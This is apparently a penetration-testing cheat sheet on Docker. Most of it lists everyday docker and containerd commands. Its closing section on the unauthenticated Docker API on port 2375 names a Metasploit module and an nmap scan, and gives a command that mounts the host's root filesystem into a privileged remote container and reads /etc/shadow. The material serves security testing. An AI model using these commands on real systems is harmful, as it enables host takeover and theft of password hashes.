2020-12-31 10:32:10 +00:00

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2375 Pentesting Docker

Docker Basics

What is

The Docker Platform is the industry-leading container platform for continuous, high-velocity innovation, enabling organizations to seamlessly build and share any application — from legacy to what comes next — and securely run them anywhere.

Basic commands

docker version #Get version of docker client, API, engine, containerd, runc, docker-init
docker info #Get more infomarion about docker settings
docker pull registry:5000/alpine #Download the image
docker inspect <containerid> #Get info of the contaienr
docker network ls #List network info
docker exec -it <containerid> /bin/sh #Get shell inside a container
docker commit <cotainerid> registry:5000/name-container #Update container
docker export -o alpine.tar <containerid> #Export container as tar file
docker ps -a #List running and stopped containers
docker stop <containedID> #Stop running container
docker rm <containerID> #Remove container ID
docker image ls #List images
docker rmi <imgeID> #Remove image
docker system prune -a
#This will remove:
#  - all stopped containers
#  - all networks not used by at least one container
#  - all images without at least one container associated to them
#  - all build cache


Containerd was designed to be used by Docker and Kubernetes as well as any other container platform that wants to abstract away syscalls or OS specific functionality to run containers on linux, windows, solaris, or other OSes. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they dont. Realistically this is impossible but at least that is what we try for. Things like networking are out of scope for containerd. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux.

Note then that Docker uses Containerd, but it only provides a subet of the features that Docker provides. So for example ContainerD doesn't have Docker's network management features, nor can you use ContainerD alone to create Docker swarms.

#Containerd CLI
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
ctr images list #List images
ctr container create registry:5000/alpine:latest alpine #Create container called alpine 
ctr container list #List containers
ctr container info <containerName> #Get container info
ctr task start <containerName> #You are given a shell inside of it
ctr task list #Get status of containers
ctr tasks attach <containerName> #Get shell in running container
ctr task pause <containerName> #Stop container
ctr tasks resume <containerName> #Resume cotainer
ctr task kill -s SIGKILL <containerName> #Stop running container
ctr container delete <containerName>

2375 - Pentesting Docker API

Basic Information

Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / root directory to the container and read/write files of the hosts environment.

Default port: 2375

2375/tcp open  docker


msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>


Check if its vulnerable to execute arbitrary code:

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow